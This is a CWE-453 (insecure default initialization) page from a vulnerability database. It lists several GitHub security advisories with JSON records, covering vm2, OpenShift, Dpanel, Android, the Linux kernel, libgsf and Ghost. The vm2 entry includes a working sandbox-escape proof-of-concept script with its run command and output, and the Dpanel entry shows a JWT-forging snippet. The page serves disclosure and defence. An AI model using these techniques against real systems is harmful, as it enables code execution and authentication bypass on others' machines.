CWE-453
AllowedInsecure Default Variable Initialization
Abstraction: Variant · Status: Draft
The product, by default, initializes an internal variable with an insecure or less secure value than is possible.
39 vulnerabilities reference this CWE, most recent first.
GHSA-HC6Q-4VVG-JF79
Vulnerability from github – Published: 2026-09-17 15:32 – Updated: 2026-10-01 15:38Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-jxxv-8r27-vm4p. This link is maintained to preserve external references.
Original Description
vm2 before 3.11.7 contains a sandbox escape vulnerability in the CLI tool that allows attackers to execute arbitrary code in the host Node.js process. Attackers can supply a malicious script file to the vm2 CLI that uses require(__filename) to re-execute itself in the host realm, bypassing sandbox isolation and accessing host modules like fs and child_process.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "vm2"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "3.11.6"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-453"
],
"github_reviewed": true,
"github_reviewed_at": "2026-10-01T15:38:40Z",
"nvd_published_at": "2026-09-17T14:18:00Z",
"severity": "CRITICAL"
},
"details": "## Duplicate Advisory\n\nThis advisory has been withdrawn because it is a duplicate of\u00a0GHSA-jxxv-8r27-vm4p. This link is maintained to preserve external references.\n\n## Original Description\nvm2 before 3.11.7 contains a sandbox escape vulnerability in the CLI tool that allows attackers to execute arbitrary code in the host Node.js process. Attackers can supply a malicious script file to the vm2 CLI that uses require(__filename) to re-execute itself in the host realm, bypassing sandbox isolation and accessing host modules like fs and child_process.",
"id": "GHSA-hc6q-4vvg-jf79",
"modified": "2026-10-01T15:38:40Z",
"published": "2026-09-17T15:32:16Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/patriksimek/vm2/security/advisories/GHSA-jxxv-8r27-vm4p"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-92950"
},
{
"type": "WEB",
"url": "https://www.vulncheck.com/advisories/vm2-before-3.11.7-sandbox-escape-via-cli-require"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
],
"summary": "Duplicate Advisory: vm2 CLI provides no sandbox isolation - host-realm require() is reachable from sandboxed scripts",
"withdrawn": "2026-10-01T15:38:40Z"
}
GHSA-J37R-C8V9-736Q
Vulnerability from github – Published: 2022-12-08 18:30 – Updated: 2022-12-12 18:30A flaw was found in Openshift. A pod with a DNSPolicy of "ClusterFirst" may incorrectly resolve the hostname based on a service provided. This flaw allows an attacker to supply an incorrect name with the DNS search policy, affecting confidentiality and availability.
{
"affected": [],
"aliases": [
"CVE-2022-3262"
],
"database_specific": {
"cwe_ids": [
"CWE-1188",
"CWE-453"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-12-08T16:15:00Z",
"severity": "HIGH"
},
"details": "A flaw was found in Openshift. A pod with a DNSPolicy of \"ClusterFirst\" may incorrectly resolve the hostname based on a service provided. This flaw allows an attacker to supply an incorrect name with the DNS search policy, affecting confidentiality and availability.",
"id": "GHSA-j37r-c8v9-736q",
"modified": "2022-12-12T18:30:29Z",
"published": "2022-12-08T18:30:49Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-3262"
},
{
"type": "WEB",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2128858"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-J752-CJCJ-W847
Vulnerability from github – Published: 2025-04-15 14:17 – Updated: 2025-04-23 15:09Summary
The Dpanel service contains a hardcoded JWT secret in its default configuration, allowing attackers to generate valid JWT tokens and compromise the host machine.
Details
The Dpanel service, when initiated using its default configuration, includes a hardcoded JWT secret embedded directly within its source code. This security flaw allows attackers to analyze the source code, discover the embedded secret, and craft legitimate JWT tokens. By forging these tokens, an attacker can successfully bypass authentication mechanisms, impersonate privileged users, and gain unauthorized administrative access. Consequently, this enables full control over the host machine, potentially leading to severe consequences such as sensitive data exposure, unauthorized command execution, privilege escalation, or further lateral movement within the network environment. It is recommended to replace the hardcoded secret with a securely generated value and load it from secure configuration storage to mitigate this vulnerability.
PoC
The core code snippet is shown below:
import jwt
def generate_jwt(appname):
payload = {
"SECRET_KEY":"SECRET_VALUE",
}
print("appname:", appname)
print("payload:", str(payload))
token = jwt.encode(payload, SECRET_KEY.format(APP_NAME=appname), algorithm="HS256")
return token
appname = "SECRET_KEY"
token = generate_jwt(appname)
print("url token:", token)
Impact
Attackers who successfully exploit this vulnerability can write arbitrary files to the host machine's file system, and all users with Dpanel versions less than 1.6.1 are affected.
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/donknap/dpanel"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.6.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-30206"
],
"database_specific": {
"cwe_ids": [
"CWE-321",
"CWE-453",
"CWE-547"
],
"github_reviewed": true,
"github_reviewed_at": "2025-04-15T14:17:25Z",
"nvd_published_at": "2025-04-15T20:15:39Z",
"severity": "CRITICAL"
},
"details": "### Summary\nThe Dpanel service contains a hardcoded JWT secret in its default configuration, allowing attackers to generate valid JWT tokens and compromise the host machine.\n\n### Details\nThe Dpanel service, when initiated using its default configuration, includes a hardcoded JWT secret embedded directly within its source code. This security flaw allows attackers to analyze the source code, discover the embedded secret, and craft legitimate JWT tokens. By forging these tokens, an attacker can successfully bypass authentication mechanisms, impersonate privileged users, and gain unauthorized administrative access. Consequently, this enables full control over the host machine, potentially leading to severe consequences such as sensitive data exposure, unauthorized command execution, privilege escalation, or further lateral movement within the network environment. It is recommended to replace the hardcoded secret with a securely generated value and load it from secure configuration storage to mitigate this vulnerability.\n\n\n### PoC\nThe core code snippet is shown below:\n```python\nimport jwt\n\ndef generate_jwt(appname):\n\n payload = {\n \"SECRET_KEY\"\uff1a\"SECRET_VALUE\",\n }\n print(\"appname:\", appname)\n print(\"payload:\", str(payload))\n token = jwt.encode(payload, SECRET_KEY.format(APP_NAME=appname), algorithm=\"HS256\")\n return token\n\nappname = \"SECRET_KEY\"\ntoken = generate_jwt(appname)\nprint(\"url token:\", token)\n```\n\n### Impact\nAttackers who successfully exploit this vulnerability can write arbitrary files to the host machine\u0027s file system, and all users with Dpanel versions less than 1.6.1 are affected.",
"id": "GHSA-j752-cjcj-w847",
"modified": "2025-04-23T15:09:48Z",
"published": "2025-04-15T14:17:25Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/donknap/dpanel/security/advisories/GHSA-j752-cjcj-w847"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-30206"
},
{
"type": "PACKAGE",
"url": "https://github.com/donknap/dpanel"
},
{
"type": "WEB",
"url": "https://pkg.go.dev/vuln/GO-2025-3612"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Dpanel\u0027s hard-coded JWT secret leads to remote code execution"
}
GHSA-JXXV-8R27-VM4P
Vulnerability from github – Published: 2026-10-01 15:40 – Updated: 2026-10-01 15:40Summary
The vm2 command-line tool installed by npm install -g vm2 and documented in the README's "CLI" section runs the supplied script under NodeVM with require:{external:true} and no root / context / builtin configured. With these defaults the resolver loads every relative or absolute require() target through the host require() function, executing the attacker's module body in the host Node.js process before the result is ever proxied back into the sandbox. A single attacker-controlled file passed to vm2 ./script.js can call require(__filename) to re-execute itself in host realm and reach fs, child_process, etc. The documented sandbox runner is therefore equivalent to node ./script.js. No additional files, flags, or user interaction are required.
Details
The vulnerability lets a malicious sandboxed script - the file argument to the documented vm2 <file> CLI - execute arbitrary code in the host Node.js process, crossing the sandbox → host boundary that vm2 is meant to enforce.
Vulnerable code path
- Source -
bin/vm2:3→lib/cli.js:7-18.process.argv[2]is the attacker-authored script path. The CLI invokes:js NodeVM.file(path, { verbose: true, require: { external: true } });Withoutrequire.root,require.context, norrequire.builtin. - Hop -
lib/nodevm.js:618-636.NodeVM.filereads the file and callsnew NodeVM(options).run(body, resolvedFilename). - Hop -
lib/nodevm.js:335→lib/resolver-compat.js:205-266(makeResolverFromLegacyOptions). Destructuresexternal:true,rootPaths=undefined,hostRequire=defaultRequire(line 218),context='host'(default, line 219). Becausetypeof externalOpt !== 'object'(line 265) it returns aCustomResolverwithcheckedRootPaths=undefinedandpathContext = () => 'host'(line 263). - Hop -
lib/setup-node-sandbox.js:86-123(requireImpl). Sandboxrequire(id)resolves viaresolver.resolve(...)(lib/nodevm.js:380-383).lib/resolver.js:244-275handles absolute/relative specifiers;tryFileatlib/resolver.js:327-329gates onthis.isPathAllowed(x). - Barrier (gap) -
lib/resolver-compat.js:53-54:js isPathAllowed(filename) { if (this.rootPaths === undefined) return true;With norootconfigured, every filesystem path is allowed.checkAccess(lib/resolver.js:39-42) delegates to the same method. - Sink -
lib/resolver-compat.js:74-77:js loadJS(vm, mod, filename) { if (this.pathContext(filename, 'js') !== 'host') return super.loadJS(...); const m = this.hostRequire(filename); // ← host-realm require() mod.exports = vm.readonly(m); }hostRequireisdefaultRequire(lib/resolver-compat.js:20-23) - the real hostrequire(). The required module's top-level body executes in the host realm beforevm.readonly()wraps the exports; wrapping happens too late to constrain side-effects.loadNode(lib/resolver-compat.js:80-83) is identical for.nodenative addons (process.dlopenin host).
PoC
Save the following as /tmp/poc.js:
'use strict';
try {
// Host realm: fs is available - write sentinel and stop.
const fs = require('fs');
fs.writeFileSync('/tmp/vm2.proof', 'host pid=' + process.pid + '\n');
console.log('HOST realm: wrote /tmp/vm2.proof');
} catch (e) {
// Sandbox realm: require('fs') threw ENOTFOUND. Re-require this file -
// the CLI resolver loads it via host require() (resolver-compat.js:76).
console.log('sandbox realm: fs blocked (' + e.message + '); escaping');
require(__filename);
}
Run via the shipped CLI exactly as the README documents:
node ./bin/vm2 /tmp/poc.js # or `vm2 /tmp/poc.js` after `npm i -g vm2`
Observed output:
sandbox realm: fs blocked (Cannot find module 'fs'); escaping
HOST realm: wrote /tmp/vm2.proof
/tmp/vm2.proof exists, written by fs.writeFileSync from a script whose
direct require('fs') was blocked by the sandbox. The first line proves the
boundary exists; the second proves it was crossed.
Impact
A user who follows the README's CLI section and runs vm2 ./untrusted.js on an
attacker-supplied file gets arbitrary code execution as that user - the
sandbox provides no isolation in this configuration. The blast radius is the
full host Node.js process: fs, child_process, process.dlopen, network,
environment.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.11.6"
},
"package": {
"ecosystem": "npm",
"name": "vm2"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.11.7"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-92950"
],
"database_specific": {
"cwe_ids": [
"CWE-1188",
"CWE-453",
"CWE-829"
],
"github_reviewed": true,
"github_reviewed_at": "2026-10-01T15:40:45Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "### Summary\nThe `vm2` command-line tool installed by `npm install -g vm2` and documented in the README\u0027s \"CLI\" section runs the supplied script under `NodeVM` with `require:{external:true}` and no `root` / `context` / `builtin` configured. With these defaults the resolver loads every relative or absolute `require()` target through the **host** `require()` function, executing the attacker\u0027s module body in the host Node.js process before the result is ever proxied back into the sandbox. A single attacker-controlled file passed to `vm2 ./script.js` can call `require(__filename)` to re-execute itself in host realm and reach `fs`, `child_process`, etc. The documented sandbox runner is therefore equivalent to `node ./script.js`. No additional files, flags, or user interaction are required.\n\n### Details\nThe vulnerability lets a **malicious sandboxed script** - the file argument to the documented `vm2 \u003cfile\u003e` CLI - execute arbitrary code in the **host Node.js process**, crossing the sandbox \u2192 host boundary that vm2 is meant to enforce.\n\n#### Vulnerable code path\n\n1. **Source** - `bin/vm2:3` \u2192 `lib/cli.js:7-18`. `process.argv[2]` is the\n attacker-authored script path. The CLI invokes:\n ```js\n NodeVM.file(path, { verbose: true, require: { external: true } });\n ```\n Without `require.root`, `require.context`, nor `require.builtin`.\n2. **Hop** - `lib/nodevm.js:618-636`. `NodeVM.file` reads the file and calls\n `new NodeVM(options).run(body, resolvedFilename)`.\n3. **Hop** - `lib/nodevm.js:335` \u2192 `lib/resolver-compat.js:205-266`\n (`makeResolverFromLegacyOptions`). Destructures `external:true`,\n `rootPaths=undefined`, `hostRequire=defaultRequire` (line 218),\n `context=\u0027host\u0027` (default, line 219). Because `typeof externalOpt !== \u0027object\u0027`\n (line 265) it returns a `CustomResolver` with `checkedRootPaths=undefined` and\n `pathContext = () =\u003e \u0027host\u0027` (line 263).\n4. **Hop** - `lib/setup-node-sandbox.js:86-123` (`requireImpl`). Sandbox\n `require(id)` resolves via `resolver.resolve(...)` (`lib/nodevm.js:380-383`).\n `lib/resolver.js:244-275` handles absolute/relative specifiers; `tryFile` at\n `lib/resolver.js:327-329` gates on `this.isPathAllowed(x)`.\n5. **Barrier (gap)** - `lib/resolver-compat.js:53-54`:\n ```js\n isPathAllowed(filename) {\n if (this.rootPaths === undefined) return true;\n ```\n With no `root` configured, **every** filesystem path is allowed. `checkAccess`\n (`lib/resolver.js:39-42`) delegates to the same method.\n6. **Sink** - `lib/resolver-compat.js:74-77`:\n ```js\n loadJS(vm, mod, filename) {\n if (this.pathContext(filename, \u0027js\u0027) !== \u0027host\u0027) return super.loadJS(...);\n const m = this.hostRequire(filename); // \u2190 host-realm require()\n mod.exports = vm.readonly(m);\n }\n ```\n `hostRequire` is `defaultRequire` (`lib/resolver-compat.js:20-23`) - the real\n host `require()`. The required module\u0027s **top-level body executes in the host\n realm** before `vm.readonly()` wraps the exports; wrapping happens too late to\n constrain side-effects. `loadNode` (`lib/resolver-compat.js:80-83`) is\n identical for `.node` native addons (`process.dlopen` in host).\n\n### PoC\nSave the following as `/tmp/poc.js`:\n\n```js\n\u0027use strict\u0027;\ntry {\n // Host realm: fs is available - write sentinel and stop.\n const fs = require(\u0027fs\u0027);\n fs.writeFileSync(\u0027/tmp/vm2.proof\u0027, \u0027host pid=\u0027 + process.pid + \u0027\\n\u0027);\n console.log(\u0027HOST realm: wrote /tmp/vm2.proof\u0027);\n} catch (e) {\n // Sandbox realm: require(\u0027fs\u0027) threw ENOTFOUND. Re-require this file -\n // the CLI resolver loads it via host require() (resolver-compat.js:76).\n console.log(\u0027sandbox realm: fs blocked (\u0027 + e.message + \u0027); escaping\u0027);\n require(__filename);\n}\n```\n\nRun via the shipped CLI exactly as the README documents:\n\n```sh\nnode ./bin/vm2 /tmp/poc.js # or `vm2 /tmp/poc.js` after `npm i -g vm2`\n```\n\nObserved output:\n\n```\nsandbox realm: fs blocked (Cannot find module \u0027fs\u0027); escaping\nHOST realm: wrote /tmp/vm2.proof\n```\n\n`/tmp/vm2.proof` exists, written by `fs.writeFileSync` from a script whose\ndirect `require(\u0027fs\u0027)` was blocked by the sandbox. The first line proves the\nboundary exists; the second proves it was crossed.\n\n\n### Impact\nA user who follows the README\u0027s CLI section and runs `vm2 ./untrusted.js` on an\nattacker-supplied file gets **arbitrary code execution as that user** - the\nsandbox provides no isolation in this configuration. The blast radius is the\nfull host Node.js process: `fs`, `child_process`, `process.dlopen`, network,\nenvironment.",
"id": "GHSA-jxxv-8r27-vm4p",
"modified": "2026-10-01T15:40:46Z",
"published": "2026-10-01T15:40:45Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/patriksimek/vm2/security/advisories/GHSA-jxxv-8r27-vm4p"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-92950"
},
{
"type": "WEB",
"url": "https://github.com/patriksimek/vm2/commit/903017c8a1eae9aba947ec854468b48155e79f86"
},
{
"type": "PACKAGE",
"url": "https://github.com/patriksimek/vm2"
},
{
"type": "WEB",
"url": "https://github.com/patriksimek/vm2/releases/tag/v3.11.7"
},
{
"type": "WEB",
"url": "https://www.vulncheck.com/advisories/vm2-before-3.11.7-sandbox-escape-via-cli-require"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "vm2 CLI provides no sandbox isolation - host-realm require() is reachable from sandboxed scripts"
}
GHSA-PH86-JHC5-HXFW
Vulnerability from github – Published: 2025-09-04 21:31 – Updated: 2025-09-04 21:31In onNullBinding of RemoteFillService.java, there is a possible background activity launch due to an insecure default value. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.
{
"affected": [],
"aliases": [
"CVE-2025-48563"
],
"database_specific": {
"cwe_ids": [
"CWE-453"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-09-04T19:15:43Z",
"severity": "HIGH"
},
"details": "In onNullBinding of RemoteFillService.java, there is a possible background activity launch due to an insecure default value. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.",
"id": "GHSA-ph86-jhc5-hxfw",
"modified": "2025-09-04T21:31:39Z",
"published": "2025-09-04T21:31:38Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-48563"
},
{
"type": "WEB",
"url": "https://android.googlesource.com/platform/frameworks/base/+/a6a570a6f4972c1dfea13c5fe3558805c1658991"
},
{
"type": "WEB",
"url": "https://source.android.com/security/bulletin/2025-09-01"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-QPCR-MXC8-RJF5
Vulnerability from github – Published: 2022-10-21 19:01 – Updated: 2022-10-24 19:00A vulnerability classified as problematic has been found in Linux Kernel. This affects the function rtl8188f_spur_calibration of the file drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_8188f.c of the component Wireless. The manipulation of the argument hw_ctrl_s1/sw_ctrl_s1 leads to use of uninitialized variable. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-211959.
{
"affected": [],
"aliases": [
"CVE-2022-3642"
],
"database_specific": {
"cwe_ids": [
"CWE-453",
"CWE-908"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-10-21T16:15:00Z",
"severity": "MODERATE"
},
"details": "A vulnerability classified as problematic has been found in Linux Kernel. This affects the function rtl8188f_spur_calibration of the file drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_8188f.c of the component Wireless. The manipulation of the argument hw_ctrl_s1/sw_ctrl_s1 leads to use of uninitialized variable. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-211959.",
"id": "GHSA-qpcr-mxc8-rjf5",
"modified": "2022-10-24T19:00:16Z",
"published": "2022-10-21T19:01:13Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-3642"
},
{
"type": "WEB",
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/wireless/wireless-next.git/commit/?id=80e5acb6dd72b25a6e6527443b9e9c1c3a7bcef6"
},
{
"type": "WEB",
"url": "https://vuldb.com/?id.211959"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-VW7M-649J-QH5X
Vulnerability from github – Published: 2023-01-19 18:30 – Updated: 2025-11-04 21:30An insecure default vulnerability exists in the Post Creation functionality of Ghost Foundation Ghost 5.9.4. Default installations of Ghost allow non-administrator users to inject arbitrary Javascript in posts, which allow privilege escalation to administrator via XSS. To trigger this vulnerability, an attacker can send an HTTP request to inject Javascript in a post to trick an administrator into visiting the post.A stored XSS vulnerability exists in the codeinjection_foot for a post.
{
"affected": [],
"aliases": [
"CVE-2022-47197"
],
"database_specific": {
"cwe_ids": [
"CWE-453",
"CWE-79"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-01-19T18:15:00Z",
"severity": "MODERATE"
},
"details": "An insecure default vulnerability exists in the Post Creation functionality of Ghost Foundation Ghost 5.9.4. Default installations of Ghost allow non-administrator users to inject arbitrary Javascript in posts, which allow privilege escalation to administrator via XSS. To trigger this vulnerability, an attacker can send an HTTP request to inject Javascript in a post to trick an administrator into visiting the post.A stored XSS vulnerability exists in the `codeinjection_foot` for a post.",
"id": "GHSA-vw7m-649j-qh5x",
"modified": "2025-11-04T21:30:28Z",
"published": "2023-01-19T18:30:20Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-47197"
},
{
"type": "WEB",
"url": "https://talosintelligence.com/vulnerability_reports/TALOS-2022-1686"
},
{
"type": "WEB",
"url": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1686"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-VX4R-H2XH-2C27
Vulnerability from github – Published: 2023-01-19 18:30 – Updated: 2025-11-04 21:30An insecure default vulnerability exists in the Post Creation functionality of Ghost Foundation Ghost 5.9.4. Default installations of Ghost allow non-administrator users to inject arbitrary Javascript in posts, which allow privilege escalation to administrator via XSS. To trigger this vulnerability, an attacker can send an HTTP request to inject Javascript in a post to trick an administrator into visiting the post.A stored XSS vulnerability exists in the codeinjection_head for a post.
{
"affected": [],
"aliases": [
"CVE-2022-47196"
],
"database_specific": {
"cwe_ids": [
"CWE-1188",
"CWE-453",
"CWE-79"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-01-19T18:15:00Z",
"severity": "MODERATE"
},
"details": "An insecure default vulnerability exists in the Post Creation functionality of Ghost Foundation Ghost 5.9.4. Default installations of Ghost allow non-administrator users to inject arbitrary Javascript in posts, which allow privilege escalation to administrator via XSS. To trigger this vulnerability, an attacker can send an HTTP request to inject Javascript in a post to trick an administrator into visiting the post.A stored XSS vulnerability exists in the `codeinjection_head` for a post.",
"id": "GHSA-vx4r-h2xh-2c27",
"modified": "2025-11-04T21:30:28Z",
"published": "2023-01-19T18:30:20Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-47196"
},
{
"type": "WEB",
"url": "https://talosintelligence.com/vulnerability_reports/TALOS-2022-1686"
},
{
"type": "WEB",
"url": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1686"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-W638-4H8H-246J
Vulnerability from github – Published: 2025-03-25 00:30 – Updated: 2025-03-25 00:30A vulnerability was found in GNOME libgsf up to 1.14.53 and classified as problematic. Affected by this issue is the function gsf_base64_encode_simple. The manipulation of the argument size leads to use of uninitialized variable. The attack needs to be approached locally. The vendor was contacted early about this disclosure but did not respond in any way.
{
"affected": [],
"aliases": [
"CVE-2025-2720"
],
"database_specific": {
"cwe_ids": [
"CWE-453"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-03-25T00:15:15Z",
"severity": "MODERATE"
},
"details": "A vulnerability was found in GNOME libgsf up to 1.14.53 and classified as problematic. Affected by this issue is the function gsf_base64_encode_simple. The manipulation of the argument size leads to use of uninitialized variable. The attack needs to be approached locally. The vendor was contacted early about this disclosure but did not respond in any way.",
"id": "GHSA-w638-4h8h-246j",
"modified": "2025-03-25T00:30:27Z",
"published": "2025-03-25T00:30:27Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-2720"
},
{
"type": "WEB",
"url": "https://vuldb.com/?ctiid.300740"
},
{
"type": "WEB",
"url": "https://vuldb.com/?id.300740"
},
{
"type": "WEB",
"url": "https://vuldb.com/?submit.520180"
},
{
"type": "WEB",
"url": "https://www.gnome.org"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
Mitigation
Disable or change default settings when they can be used to abuse the system. Since those default settings are shipped with the product they are likely to be known by a potential attacker who is familiar with the product. For instance, default credentials should be changed or the associated accounts should be disabled.
No CAPEC attack patterns related to this CWE.